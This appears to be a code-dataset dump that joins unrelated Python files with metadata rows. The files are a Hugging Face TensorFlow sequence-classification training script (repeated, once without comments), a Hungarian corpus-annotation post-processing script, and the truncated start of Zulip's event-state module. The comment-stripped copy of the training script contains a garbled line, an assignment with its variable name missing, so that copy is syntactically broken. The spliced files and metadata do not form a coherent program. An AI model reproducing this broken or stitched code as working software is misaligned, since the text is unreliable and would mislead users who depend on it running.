optimizer = tf.keras.optimizers.Adam(
learning_rate=training_args.learning_rate,
beta_1=training_args.adam_beta1,
beta_2=training_args.adam_beta2,
epsilon=training_args.adam_epsilon,
clipnorm=training_args.max_grad_norm,
)
if is_regression:
loss = tf.keras.losses.MeanSquaredError()
metrics = []
else:
loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)
metrics = ["accuracy"]
model.compile(optimizer=optimizer, loss=loss, metrics=metrics)
# endregion
# region Dataset preprocessing
# Again, we try to have some nice defaults but don't hesitate to tweak to your use case.
column_names = {col for cols in datasets.column_names.values() for col in cols}
non_label_column_names = [name for name in column_names if name != "label"]
if "sentence1" in non_label_column_names and "sentence2" in non_label_column_names:
sentence1_key, sentence2_key = "sentence1", "sentence2"
elif "sentence1" in non_label_column_names:
sentence1_key, sentence2_key = "sentence1", None
else:
if len(non_label_column_names) >= 2:
sentence1_key, sentence2_key = non_label_column_names[:2]
else:
sentence1_key, sentence2_key = non_label_column_names[0], None
# Padding strategy
if data_args.pad_to_max_length:
padding = "max_length"
else:
# We will pad later, dynamically at batch creation, to the max sequence length in each batch
padding = False
if data_args.max_seq_length > tokenizer.model_max_length:
logger.warning(
f"The max_seq_length passed ({data_args.max_seq_length}) is larger than the maximum length for the"
f"model ({tokenizer.model_max_length}). Using max_seq_length={tokenizer.model_max_length}."
)
max_seq_length = min(data_args.max_seq_length, tokenizer.model_max_length)
# Ensure that our labels match the model's, if it has some pre-specified
if "train" in datasets:
if not is_regression and model.config.label2id != PretrainedConfig(num_labels=num_labels).label2id:
label_name_to_id = model.config.label2id
if list(sorted(label_name_to_id.keys())) == list(sorted(label_list)):
label_to_id = label_name_to_id # Use the model's labels
else:
logger.warning(
"Your model seems to have been trained with labels, but they don't match the dataset: ",
f"model labels: {list(sorted(label_name_to_id.keys()))}, dataset labels: {list(sorted(label_list))}."
"\nIgnoring the model labels as a result.",
)
label_to_id = {v: i for i, v in enumerate(label_list)}
elif not is_regression:
label_to_id = {v: i for i, v in enumerate(label_list)}
else:
label_to_id = None
# Now we've established our label2id, let's overwrite the model config with it.
model.config.label2id = label_to_id
if model.config.label2id is not None:
model.config.id2label = {id: label for label, id in label_to_id.items()}
else:
model.config.id2label = None
else:
label_to_id = model.config.label2id # Just load the data from the model
if "validation" in datasets and model.config.label2id is not None:
validation_label_list = datasets["validation"].unique("label")
for val_label in validation_label_list:
assert val_label in label_to_id, f"Label {val_label} is in the validation set but not the training set!"
def preprocess_function(examples):
# Tokenize the texts
args = (
(examples[sentence1_key],) if sentence2_key is None else (examples[sentence1_key], examples[sentence2_key])
)
result = tokenizer(*args, padding=padding, max_length=max_seq_length, truncation=True)
# Map labels to IDs
if model.config.label2id is not None and "label" in examples:
result["label"] = [(model.config.label2id[l] if l != -1 else -1) for l in examples["label"]]
return result
datasets = datasets.map(preprocess_function, batched=True, load_from_cache_file=not data_args.overwrite_cache)
if "train" in datasets:
train_dataset = datasets["train"]
if data_args.max_train_samples is not None:
train_dataset = train_dataset.select(range(data_args.max_train_samples))
# Log a few random samples from the training set so we can see that it's working as expected:
for index in random.sample(range(len(train_dataset)), 3):
logger.info(f"Sample {index} of the training set: {train_dataset[index]}.")
if "validation" in datasets:
eval_dataset = datasets["validation"]
if data_args.max_eval_samples is not None:
eval_dataset = eval_dataset.select(range(data_args.max_eval_samples))
if "test" in datasets:
predict_dataset = datasets["test"]
if data_args.max_predict_samples is not None:
predict_dataset = predict_dataset.select(range(data_args.max_predict_samples))
# endregion
# region Training
if "train" in datasets:
training_dataset = DataSequence(
train_dataset, non_label_column_names, batch_size=training_args.per_device_train_batch_size, labels=True
)
if "validation" in datasets:
eval_dataset = DataSequence(
eval_dataset, non_label_column_names, batch_size=training_args.per_device_eval_batch_size, labels=True
)
else:
eval_dataset = None
callbacks = [SavePretrainedCallback(output_dir=training_args.output_dir)]
model.fit(
training_dataset,
validation_data=eval_dataset,
epochs=int(training_args.num_train_epochs),
callbacks=callbacks,
)
elif "validation" in datasets:
# If there's a validation dataset but no training set, just evaluate the metrics
eval_dataset = DataSequence(
eval_dataset, non_label_column_names, batch_size=training_args.per_device_eval_batch_size, labels=True
)
logger.info("Computing metrics on validation data...")
if is_regression:
loss = model.evaluate(eval_dataset)
logger.info(f"Loss: {loss:.5f}")
else:
loss, accuracy = model.evaluate(eval_dataset)
logger.info(f"Loss: {loss:.5f}, Accuracy: {accuracy * 100:.4f}%")
# endregion
# region Prediction
if "test" in datasets:
logger.info("Doing predictions on Predict dataset...")
predict_dataset = DataSequence(
predict_dataset, non_label_column_names, batch_size=training_args.per_device_eval_batch_size, labels=False
)
predictions = model.predict(predict_dataset)["logits"]
predictions = np.squeeze(predictions) if is_regression else np.argmax(predictions, axis=1)
output_predict_file = os.path.join(training_args.output_dir, "predict_results.txt")
with open(output_predict_file, "w") as writer:
writer.write("index\tprediction\n")
for index, item in enumerate(predictions):
if is_regression:
writer.write(f"{index}\t{item:3.3f}\n")
else:
item = model.config.id2label[item]
writer.write(f"{index}\t{item}\n")
logger.info(f"Wrote predictions to {output_predict_file}!")
# endregion
if __name__ == "__main__":
main()
| 43.122677 | 121 | 0.671078 |
import logging
import os
import random
import sys
from dataclasses import dataclass, field
from math import ceil
from pathlib import Path
from typing import Optional
import numpy as np
from datasets import load_dataset
from transformers import (
AutoConfig,
AutoTokenizer,
HfArgumentParser,
PretrainedConfig,
TFAutoModelForSequenceClassification,
TrainingArguments,
set_seed,
)
from transformers.file_utils import CONFIG_NAME, TF2_WEIGHTS_NAME
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "1"
import tensorflow as tf
logger = logging.getLogger(__name__)
class DataSequence(tf.keras.utils.Sequence):
# and pass those straight to the Model, this constrains you in a couple of ways. Most notably, it requires all
# the data to be padded to the length of the longest input example, and it also requires the whole dataset to be
# loaded into memory. If these aren't major problems for you, you can skip the sequence object in your own code!
def __init__(self, dataset, non_label_column_names, batch_size, labels, shuffle=True):
super().__init__()
self.data = {
key: dataset[key]
for key in dataset.features.keys()
if key not in non_label_column_names and key != "label"
}
data_lengths = {len(array) for array in self.data.values()}
assert len(data_lengths) == 1, "Dataset arrays differ in length!"
self.data_length = data_lengths.pop()
self.num_batches = ceil(self.data_length / batch_size)
if labels:
self.labels = np.array(dataset["label"])
assert len(self.labels) == self.data_length, "Labels not the same length as input arrays!"
else:
self.labels = None
self.batch_size = batch_size
self.shuffle = shuffle
if self.shuffle:
self.permutation = np.random.permutation(self.data_length)
else:
self.permutation = None
def on_epoch_end(self):
if self.shuffle:
self.permutation = np.random.permutation(self.data_length)
def __getitem__(self, item):
# Note that this yields a batch, not a single sample
batch_start = item * self.batch_size
batch_end = (item + 1) * self.batch_size
if self.shuffle:
data_indices = self.permutation[batch_start:batch_end]
else:
data_indices = np.arange(batch_start, batch_end)
# We want to pad the data as little as possible, so we only pad each batch
# to the maximum length within that batch. We do that by stacking the variable-
# length inputs into a ragged tensor and then densifying it.
batch_input = {
key: tf.ragged.constant([data[i] for i in data_indices]).to_tensor() for key, data in self.data.items()
}
if self.labels is None:
return batch_input
else:
batch_labels = self.labels[data_indices]
return batch_input, batch_labels
def __len__(self):
return self.num_batches
class SavePretrainedCallback(tf.keras.callbacks.Callback):
# Hugging Face models have a save_pretrained() method that saves both the weights and the necessary
# metadata to allow them to be loaded as a pretrained model in future. This is a simple Keras callback
# that saves the model with this method after each epoch.
def __init__(self, output_dir, **kwargs):
super().__init__()
self.output_dir = output_dir
def on_epoch_end(self, epoch, logs=None):
self.model.save_pretrained(self.output_dir)
# endregion
# region Command-line arguments
@dataclass
class DataTrainingArguments:
train_file: Optional[str] = field(
default=None, metadata={"help": "A csv or a json file containing the training data."}
)
validation_file: Optional[str] = field(
default=None, metadata={"help": "A csv or a json file containing the validation data."}
)
test_file: Optional[str] = field(default=None, metadata={"help": "A csv or a json file containing the test data."})
max_seq_length: int = field(
default=128,
metadata={
"help": "The maximum total input sequence length after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded."
},
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached preprocessed datasets or not."}
)
pad_to_max_length: bool = field(
default=False,
metadata={
"help": "Whether to pad all samples to `max_seq_length`. "
"If False, will pad the samples dynamically when batching to the maximum length in the batch."
},
)
max_train_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of training examples to this "
"value if set."
},
)
max_eval_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of evaluation examples to this "
"value if set."
},
)
max_predict_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of predict examples to this "
"value if set."
},
)
def __post_init__(self):
train_extension = self.train_file.split(".")[-1].lower() if self.train_file is not None else None
validation_extension = (
self.validation_file.split(".")[-1].lower() if self.validation_file is not None else None
)
test_extension = self.test_file.split(".")[-1].lower() if self.test_file is not None else None
extensions = {train_extension, validation_extension, test_extension}
extensions.discard(None)
assert len(extensions) != 0, "Need to supply at least one of --train_file, --validation_file or --test_file!"
assert len(extensions) == 1, "All input files should have the same file extension, either csv or json!"
assert "csv" in extensions or "json" in extensions, "Input files should have either .csv or .json extensions!"
self.input_file_extension = extensions.pop()
@dataclass
class ModelArguments:
model_name_or_path: str = field(
metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"}
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None,
metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"},
)
model_revision: str = field(
default="main",
metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
)
use_auth_token: bool = field(
default=False,
metadata={
"help": "Will use the token generated when running `transformers-cli login` (necessary to use this script "
"with private models)."
},
)
# endregion
def main():
# region Argument parsing
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
output_dir = Path(training_args.output_dir)
output_dir.mkdir(parents=True, exist_ok=True)
# endregion
# region Checkpoints
# Detecting last checkpoint.
checkpoint = None
if len(os.listdir(training_args.output_dir)) > 0 and not training_args.overwrite_output_dir:
if (output_dir / CONFIG_NAME).is_file() and (output_dir / TF2_WEIGHTS_NAME).is_file():
checkpoint = output_dir
logger.info(
f"Checkpoint detected, resuming training from checkpoint in {training_args.output_dir}. To avoid this"
" behavior, change the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
)
else:
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. "
"Use --overwrite_output_dir to continue regardless."
)
# endregion
# region Logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
handlers=[logging.StreamHandler(sys.stdout)],
)
logger.setLevel(logging.INFO)
logger.info(f"Training/evaluation parameters {training_args}")
# endregion
# region Loading data
# For CSV/JSON files, this script will use the 'label' field as the label and the 'sentence1' and optionally
# 'sentence2' fields as inputs if they exist. If not, the first two fields not named label are used if at least two
# columns are provided. Note that the term 'sentence' can be slightly misleading, as they often contain more than
# a single grammatical sentence, when the task requires it.
#
# If the CSVs/JSONs contain only one non-label column, the script does single sentence classification on this
# single column. You can easily tweak this behavior (see below)
#
# In distributed training, the load_dataset function guarantee that only one local process can concurrently
# download the dataset.
data_files = {"train": data_args.train_file, "validation": data_args.validation_file, "test": data_args.test_file}
data_files = {key: file for key, file in data_files.items() if file is not None}
for key in data_files.keys():
logger.info(f"Loading a local file for {key}: {data_files[key]}")
if data_args.input_file_extension == "csv":
# Loading a dataset from local csv files
datasets = load_dataset("csv", data_files=data_files, cache_dir=model_args.cache_dir)
else:
# Loading a dataset from local json files
datasets = load_dataset("json", data_files=data_files, cache_dir=model_args.cache_dir)
# See more about loading any type of standard or custom dataset at
# https://huggingface.co/docs/datasets/loading_datasets.html.
# endregion
# region Label preprocessing
# If you've passed us a training set, we try to infer your labels from it
if "train" in datasets:
# and if not then you're doing classification. This is something you may want to change!
is_regression = datasets["train"].features["label"].dtype in ["float32", "float64"]
if is_regression:
num_labels = 1
else:
= datasets["train"].unique("label")
label_list.sort()
num_labels = len(label_list)
# If you haven't passed a training set, we read label info from the saved model (this happens later)
else:
num_labels = None
label_list = None
is_regression = None
set_seed(training_args.seed)
if checkpoint is not None:
config_path = training_args.output_dir
elif model_args.config_name:
config_path = model_args.config_name
else:
config_path = model_args.model_name_or_path
if num_labels is not None:
config = AutoConfig.from_pretrained(
config_path,
num_labels=num_labels,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
else:
config = AutoConfig.from_pretrained(
config_path,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
tokenizer = AutoTokenizer.from_pretrained(
model_args.tokenizer_name if model_args.tokenizer_name else model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
if checkpoint is None:
model_path = model_args.model_name_or_path
else:
model_path = checkpoint
model = TFAutoModelForSequenceClassification.from_pretrained(
model_path,
config=config,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
optimizer = tf.keras.optimizers.Adam(
learning_rate=training_args.learning_rate,
beta_1=training_args.adam_beta1,
beta_2=training_args.adam_beta2,
epsilon=training_args.adam_epsilon,
clipnorm=training_args.max_grad_norm,
)
if is_regression:
loss = tf.keras.losses.MeanSquaredError()
metrics = []
else:
loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)
metrics = ["accuracy"]
model.compile(optimizer=optimizer, loss=loss, metrics=metrics)
column_names = {col for cols in datasets.column_names.values() for col in cols}
non_label_column_names = [name for name in column_names if name != "label"]
if "sentence1" in non_label_column_names and "sentence2" in non_label_column_names:
sentence1_key, sentence2_key = "sentence1", "sentence2"
elif "sentence1" in non_label_column_names:
sentence1_key, sentence2_key = "sentence1", None
else:
if len(non_label_column_names) >= 2:
sentence1_key, sentence2_key = non_label_column_names[:2]
else:
sentence1_key, sentence2_key = non_label_column_names[0], None
# Padding strategy
if data_args.pad_to_max_length:
padding = "max_length"
else:
# We will pad later, dynamically at batch creation, to the max sequence length in each batch
padding = False
if data_args.max_seq_length > tokenizer.model_max_length:
logger.warning(
f"The max_seq_length passed ({data_args.max_seq_length}) is larger than the maximum length for the"
f"model ({tokenizer.model_max_length}). Using max_seq_length={tokenizer.model_max_length}."
)
max_seq_length = min(data_args.max_seq_length, tokenizer.model_max_length)
# Ensure that our labels match the model's, if it has some pre-specified
if "train" in datasets:
if not is_regression and model.config.label2id != PretrainedConfig(num_labels=num_labels).label2id:
label_name_to_id = model.config.label2id
if list(sorted(label_name_to_id.keys())) == list(sorted(label_list)):
label_to_id = label_name_to_id
else:
logger.warning(
"Your model seems to have been trained with labels, but they don't match the dataset: ",
f"model labels: {list(sorted(label_name_to_id.keys()))}, dataset labels: {list(sorted(label_list))}."
"\nIgnoring the model labels as a result.",
)
label_to_id = {v: i for i, v in enumerate(label_list)}
elif not is_regression:
label_to_id = {v: i for i, v in enumerate(label_list)}
else:
label_to_id = None
model.config.label2id = label_to_id
if model.config.label2id is not None:
model.config.id2label = {id: label for label, id in label_to_id.items()}
else:
model.config.id2label = None
else:
label_to_id = model.config.label2id
if "validation" in datasets and model.config.label2id is not None:
validation_label_list = datasets["validation"].unique("label")
for val_label in validation_label_list:
assert val_label in label_to_id, f"Label {val_label} is in the validation set but not the training set!"
def preprocess_function(examples):
args = (
(examples[sentence1_key],) if sentence2_key is None else (examples[sentence1_key], examples[sentence2_key])
)
result = tokenizer(*args, padding=padding, max_length=max_seq_length, truncation=True)
if model.config.label2id is not None and "label" in examples:
result["label"] = [(model.config.label2id[l] if l != -1 else -1) for l in examples["label"]]
return result
datasets = datasets.map(preprocess_function, batched=True, load_from_cache_file=not data_args.overwrite_cache)
if "train" in datasets:
train_dataset = datasets["train"]
if data_args.max_train_samples is not None:
train_dataset = train_dataset.select(range(data_args.max_train_samples))
for index in random.sample(range(len(train_dataset)), 3):
logger.info(f"Sample {index} of the training set: {train_dataset[index]}.")
if "validation" in datasets:
eval_dataset = datasets["validation"]
if data_args.max_eval_samples is not None:
eval_dataset = eval_dataset.select(range(data_args.max_eval_samples))
if "test" in datasets:
predict_dataset = datasets["test"]
if data_args.max_predict_samples is not None:
predict_dataset = predict_dataset.select(range(data_args.max_predict_samples))
# endregion
# region Training
if "train" in datasets:
training_dataset = DataSequence(
train_dataset, non_label_column_names, batch_size=training_args.per_device_train_batch_size, labels=True
)
if "validation" in datasets:
eval_dataset = DataSequence(
eval_dataset, non_label_column_names, batch_size=training_args.per_device_eval_batch_size, labels=True
)
else:
eval_dataset = None
callbacks = [SavePretrainedCallback(output_dir=training_args.output_dir)]
model.fit(
training_dataset,
validation_data=eval_dataset,
epochs=int(training_args.num_train_epochs),
callbacks=callbacks,
)
elif "validation" in datasets:
# If there's a validation dataset but no training set, just evaluate the metrics
eval_dataset = DataSequence(
eval_dataset, non_label_column_names, batch_size=training_args.per_device_eval_batch_size, labels=True
)
logger.info("Computing metrics on validation data...")
if is_regression:
loss = model.evaluate(eval_dataset)
logger.info(f"Loss: {loss:.5f}")
else:
loss, accuracy = model.evaluate(eval_dataset)
logger.info(f"Loss: {loss:.5f}, Accuracy: {accuracy * 100:.4f}%")
if "test" in datasets:
logger.info("Doing predictions on Predict dataset...")
predict_dataset = DataSequence(
predict_dataset, non_label_column_names, batch_size=training_args.per_device_eval_batch_size, labels=False
)
predictions = model.predict(predict_dataset)["logits"]
predictions = np.squeeze(predictions) if is_regression else np.argmax(predictions, axis=1)
output_predict_file = os.path.join(training_args.output_dir, "predict_results.txt")
with open(output_predict_file, "w") as writer:
writer.write("index\tprediction\n")
for index, item in enumerate(predictions):
if is_regression:
writer.write(f"{index}\t{item:3.3f}\n")
else:
item = model.config.id2label[item]
writer.write(f"{index}\t{item}\n")
logger.info(f"Wrote predictions to {output_predict_file}!")
if __name__ == "__main__":
main()
| true | true |
f725f1eac8da74b8562cac6b78cc781c40c19706 | 4,237 | py | Python | szkriptek/tag_postproc.py | vadno/korkor_pilot | 8805f3a6a1145420f112d4c1ce95538c698d41ef | [
"CC-BY-4.0"
] | 2 | 2020-09-30T19:25:10.000Z | 2021-11-03T20:23:31.000Z | szkriptek/tag_postproc.py | vadno/korkor_pilot | 8805f3a6a1145420f112d4c1ce95538c698d41ef | [
"CC-BY-4.0"
] | null | null | null | szkriptek/tag_postproc.py | vadno/korkor_pilot | 8805f3a6a1145420f112d4c1ce95538c698d41ef | [
"CC-BY-4.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# author: Vadász Noémi
# created: 2019/03/28
# feldolgozza a google spreadsheetsben annotált, előtte emtsv-vel elemzett korpuszfájlt
# bemenet
# csv (google spreadsheetsből importált)
# token, összes elemzés, tő, részletes címke, tag, helyes, javított tő, tokenizálás, javított token, megjegyzés
# tokenenként annyi sor, ahány különböző emmorph elemzés (címke+tő kombináció) van az anas oszlopban
# a kézzel kiválasztott címke+tő kombinációnál a 6. (helyes) oszlopban X szerepel
# ha nem üres a 6. oszlop, akkor a 2. oszlopba annak tartalma megy (lemma javítása)
# ha nem üres a 7. oszlop, akkor a tokenizálás javítását szolgáló parancsokat végre kell hajtani
# ha nem üres a 8. oszlop, akkor a 0. oszlopba annak tartalma megy (token javítása)
# kimenet
# xtsv
# form, anas, lemma, xpostag
# soronként egy token
# mondatok között üres sor
import csv
import sys
# 0: string
# 1: anas
# 2: lemma
# 3: hfstana
# 4: tag
# 5: helyes
# 6: javított tő
# 7: tokenizálás
# 8: javított token
# 9: megjegyzés
def read_file():
"""
stdin-ről olvas
első sor: header
feldolgozza a tokenizálás javítását szolgáló parancsokat, ennek megfelelően tárolja el a sorokat
"""
empty_line = dict()
empty_line['string'] = ''
lines = list()
newtoken = dict()
reader = csv.reader(sys.stdin)
next(reader)
for line in reader:
# új token
if line[0] or line[7] == 'token beszúr':
if newtoken:
lines.append(newtoken)
newtoken = dict()
if line[7] not in ('token össze', 'token töröl'):
if line[7] == 'token beszúr':
newtoken['anas'] = '[]'
newtoken['anas'] = line[1]
# jó token
if not line[8]:
newtoken['string'] = line[0]
# hibás token
else:
newtoken['string'] = line[8]
# jó tő
if not line[6]:
newtoken['lemma'] = line[2]
# hibás tő
else:
newtoken['lemma'] = line[6]
# jó vagy javított címke
if line[5]:
# jó címke
if line[5] == 'X':
newtoken['hfstana'] = line[4]
# javított címke
else:
newtoken['hfstana'] = line[5]
# összetokenizálás
else:
# összetokenizálás első sora
if line[6] and line[7]:
newtoken['string'] = line[8]
newtoken['lemma'] = line[6]
newtoken['anas'] = line[1]
# jó címke
if line[5] == 'X':
newtoken['hfstana'] = line[4]
# javított címke
else:
newtoken['hfstana'] = line[5]
# alternatív címkék
else:
# alternatív címke és tő megadva
if 'X' in line[5]:
newtoken['lemma'] = line[2]
newtoken['hfstana'] = line[4]
# széttokenizálás
elif line[7] == 'token szét':
lines.append(newtoken)
newtoken = dict()
newtoken['anas'] = '[]'
newtoken['string'] = line[8]
newtoken['lemma'] = line[6]
newtoken['hfstana'] = line[5]
# mondat széttokenizálása
elif all(cell == '' for cell in line) or line[7] == 'mondat szét':
lines.append(newtoken)
lines.append(empty_line)
newtoken = dict()
lines.append(newtoken)
return lines
def print_file(lines):
"""
stdout-ra ír
xtsv kimenet
"""
print('form\tanas\tlemma\txpostag')
for line in lines:
if len(line) > 1:
print(line['string'], line['anas'], line['lemma'], line['hfstana'], sep='\t')
else:
print(line['string'])
print('')
def main():
lines = read_file()
print_file(lines)
if __name__ == "__main__":
main()
| 26.987261 | 111 | 0.509559 |
import csv
import sys
def read_file():
empty_line = dict()
empty_line['string'] = ''
lines = list()
newtoken = dict()
reader = csv.reader(sys.stdin)
next(reader)
for line in reader:
if line[0] or line[7] == 'token beszúr':
if newtoken:
lines.append(newtoken)
newtoken = dict()
if line[7] not in ('token össze', 'token töröl'):
if line[7] == 'token beszúr':
newtoken['anas'] = '[]'
newtoken['anas'] = line[1]
if not line[8]:
newtoken['string'] = line[0]
else:
newtoken['string'] = line[8]
if not line[6]:
newtoken['lemma'] = line[2]
else:
newtoken['lemma'] = line[6]
if line[5]:
if line[5] == 'X':
newtoken['hfstana'] = line[4]
else:
newtoken['hfstana'] = line[5]
else:
if line[6] and line[7]:
newtoken['string'] = line[8]
newtoken['lemma'] = line[6]
newtoken['anas'] = line[1]
if line[5] == 'X':
newtoken['hfstana'] = line[4]
else:
newtoken['hfstana'] = line[5]
else:
if 'X' in line[5]:
newtoken['lemma'] = line[2]
newtoken['hfstana'] = line[4]
elif line[7] == 'token szét':
lines.append(newtoken)
newtoken = dict()
newtoken['anas'] = '[]'
newtoken['string'] = line[8]
newtoken['lemma'] = line[6]
newtoken['hfstana'] = line[5]
elif all(cell == '' for cell in line) or line[7] == 'mondat szét':
lines.append(newtoken)
lines.append(empty_line)
newtoken = dict()
lines.append(newtoken)
return lines
def print_file(lines):
print('form\tanas\tlemma\txpostag')
for line in lines:
if len(line) > 1:
print(line['string'], line['anas'], line['lemma'], line['hfstana'], sep='\t')
else:
print(line['string'])
print('')
def main():
lines = read_file()
print_file(lines)
if __name__ == "__main__":
main()
| true | true |
f725f2459a905256eb3220d58ce2d66c8bceeae6 | 66,037 | py | Python | zerver/lib/events.py | nipunn1313/zulip | 35f9ed6ebe28c7d66e8a62b2c235f19ad0f44a0b | [
"Apache-2.0"
] | 1 | 2021-06-25T18:10:20.000Z | 2021-06-25T18:10:20.000Z | zerver/lib/events.py | nipunn1313/zulip | 35f9ed6ebe28c7d66e8a62b2c235f19ad0f44a0b | [
"Apache-2.0"
] | 10 | 2021-11-15T17:53:29.000Z | 2022-02-27T13:51:47.000Z | zerver/lib/events.py | nipunn1313/zulip | 35f9ed6ebe28c7d66e8a62b2c235f19ad0f44a0b | [
"Apache-2.0"
] | 1 | 2021-11-30T08:00:26.000Z | 2021-11-30T08:00:26.000Z | # See https://zulip.readthedocs.io/en/latest/subsystems/events-system.html for
# high-level documentation on how this system works.
import copy
import time
from typing import Any, Callable, Collection, Dict, Iterable, Optional, Sequence, Set
from django.conf import settings
from django.utils.translation import gettext as _
from version import API_FEATURE_LEVEL, ZULIP_MERGE_BASE, ZULIP_VERSION
from zerver.lib.actions import (
default_stream_groups_to_dicts_sorted,
do_get_streams,
gather_subscriptions_helper,
get_available_notification_sounds,
get_default_streams_for_realm,
get_owned_bot_dicts,
get_web_public_streams,
get_web_public_subs,
streams_to_dicts_sorted,
)
from zerver.lib.alert_words import user_alert_words
from zerver.lib.avatar import avatar_url
from zerver.lib.bot_config import load_bot_config_template
from zerver.lib.compatibility import is_outdated_server
from zerver.lib.exceptions import JsonableError
from zerver.lib.external_accounts import DEFAULT_EXTERNAL_ACCOUNTS
from zerver.lib.hotspots import get_next_hotspots
from zerver.lib.integrations import EMBEDDED_BOTS, WEBHOOK_INTEGRATIONS
from zerver.lib.message import (
aggregate_unread_data,
apply_unread_message_event,
extract_unread_data_from_um_rows,
get_raw_unread_data,
get_recent_conversations_recipient_id,
get_recent_private_conversations,
get_starred_message_ids,
remove_message_id_from_unread_mgs,
)
from zerver.lib.narrow import check_supported_events_narrow_filter, read_stop_words
from zerver.lib.presence import get_presence_for_user, get_presences_for_realm
from zerver.lib.push_notifications import push_notifications_enabled
from zerver.lib.realm_icon import realm_icon_url
from zerver.lib.realm_logo import get_realm_logo_source, get_realm_logo_url
from zerver.lib.soft_deactivation import reactivate_user_if_soft_deactivated
from zerver.lib.stream_subscription import handle_stream_notifications_compatibility
from zerver.lib.timestamp import datetime_to_timestamp
from zerver.lib.topic import TOPIC_NAME
from zerver.lib.topic_mutes import get_topic_mutes
from zerver.lib.user_groups import user_groups_in_realm_serialized
from zerver.lib.user_mutes import get_user_mutes
from zerver.lib.user_status import get_user_info_dict
from zerver.lib.users import get_cross_realm_dicts, get_raw_user_data, is_administrator_role
from zerver.models import (
MAX_TOPIC_NAME_LENGTH,
Client,
CustomProfileField,
Draft,
Message,
Realm,
RealmUserDefault,
Stream,
UserMessage,
UserProfile,
UserStatus,
custom_profile_fields_for_realm,
get_default_stream_groups,
get_realm_domains,
get_realm_playgrounds,
linkifiers_for_realm,
realm_filters_for_realm,
)
from zerver.tornado.django_api import get_user_events, request_event_queue
from zproject.backends import email_auth_enabled, password_auth_enabled
class RestartEventException(Exception):
"""
Special error for handling restart events in apply_events.
"""
def add_realm_logo_fields(state: Dict[str, Any], realm: Realm) -> None:
state["realm_logo_url"] = get_realm_logo_url(realm, night=False)
state["realm_logo_source"] = get_realm_logo_source(realm, night=False)
state["realm_night_logo_url"] = get_realm_logo_url(realm, night=True)
state["realm_night_logo_source"] = get_realm_logo_source(realm, night=True)
state["max_logo_file_size_mib"] = settings.MAX_LOGO_FILE_SIZE_MIB
def always_want(msg_type: str) -> bool:
"""
This function is used as a helper in
fetch_initial_state_data, when the user passes
in None for event_types, and we want to fetch
info for every event type. Defining this at module
level makes it easier to mock.
"""
return True
def fetch_initial_state_data(
user_profile: Optional[UserProfile],
*,
realm: Optional[Realm] = None,
event_types: Optional[Iterable[str]] = None,
queue_id: Optional[str] = "",
client_gravatar: bool = False,
user_avatar_url_field_optional: bool = False,
user_settings_object: bool = False,
slim_presence: bool = False,
include_subscribers: bool = True,
include_streams: bool = True,
) -> Dict[str, Any]:
"""When `event_types` is None, fetches the core data powering the
web app's `page_params` and `/api/v1/register` (for mobile/terminal
apps). Can also fetch a subset as determined by `event_types`.
The user_profile=None code path is used for logged-out public
access to streams with is_web_public=True.
Whenever you add new code to this function, you should also add
corresponding events for changes in the data structures and new
code to apply_events (and add a test in test_events.py).
"""
if realm is None:
assert user_profile is not None
realm = user_profile.realm
state: Dict[str, Any] = {"queue_id": queue_id}
if event_types is None:
# return True always
want: Callable[[str], bool] = always_want
else:
want = set(event_types).__contains__
# Show the version info unconditionally.
state["zulip_version"] = ZULIP_VERSION
state["zulip_feature_level"] = API_FEATURE_LEVEL
state["zulip_merge_base"] = ZULIP_MERGE_BASE
if want("alert_words"):
state["alert_words"] = [] if user_profile is None else user_alert_words(user_profile)
# Spectators can't access full user profiles or personal settings,
# so there's no need to send custom profile field data.
if want("custom_profile_fields") and user_profile is not None:
fields = custom_profile_fields_for_realm(realm.id)
state["custom_profile_fields"] = [f.as_dict() for f in fields]
state["custom_profile_field_types"] = {
item[4]: {"id": item[0], "name": str(item[1])}
for item in CustomProfileField.ALL_FIELD_TYPES
}
if want("hotspots"):
# Even if we offered special hotspots for guests without an
# account, we'd maybe need to store their state using cookies
# or local storage, rather than in the database.
state["hotspots"] = [] if user_profile is None else get_next_hotspots(user_profile)
if want("message"):
# Since the introduction of `anchor="latest"` in the API,
# `max_message_id` is primarily used for generating `local_id`
# values that are higher than this. We likely can eventually
# remove this parameter from the API.
user_messages = []
if user_profile is not None:
user_messages = (
UserMessage.objects.filter(user_profile=user_profile)
.order_by("-message_id")
.values("message_id")[:1]
)
if user_messages:
state["max_message_id"] = user_messages[0]["message_id"]
else:
state["max_message_id"] = -1
if want("drafts"):
# Note: if a user ever disables syncing drafts then all of
